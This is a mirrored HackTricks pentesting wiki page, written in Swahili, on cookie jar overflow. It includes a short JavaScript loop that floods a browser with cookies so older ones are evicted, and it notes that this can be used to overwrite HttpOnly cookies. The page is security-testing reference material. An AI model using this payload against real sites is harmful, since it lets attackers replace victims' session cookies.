maride/hacktricks
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks.git synced 2025-10-10 18:36:50 +00:00
Code Issues Packages Projects Releases Wiki Activity
hacktricks/src/pentesting-web/hacking-with-cookies/cookie-jar-overflow.md

23 lines
985 B
Markdown
Raw Blame History

{{#include ../../banners/hacktricks-training.md}}
Vivinjari vina **mipaka juu ya idadi ya cookies** ambazo vinaweza kuhifadhi kwa ukurasa. Kisha, ikiwa kwa sababu fulani unahitaji **kufanya cookie ipotee**, unaweza **kujaa jar la cookie** kwani zile za zamani zitaondolewa kwanza:
```javascript
// Set many cookies
for (let i = 0; i < 700; i++) {
document.cookie = `cookie${i}=${i}; Secure`
}
// Remove all cookies
for (let i = 0; i < 700; i++) {
document.cookie = `cookie${i}=${i};expires=Thu, 01 Jan 1970 00:00:01 GMT`
}
```
Kumbuka, kwamba vidakuzi vya upande wa tatu vinavyotaja kikoa tofauti havitafutwa.
> [!CAUTION]
> Shambulio hili linaweza pia kutumika **kufuta vidakuzi vya HttpOnly kwani unaweza kuvifuta kisha kuviweka tena kwa thamani unayotaka**.
>
> Angalia hii katika [**hiki kipande na maabara**](https://www.sjoerdlangkemper.nl/2020/05/27/overwriting-httponly-cookies-from-javascript-using-cookie-jar-overflow/).
{{#include ../../banners/hacktricks-training.md}}
Reference in New Issue View Git Blame Copy Permalink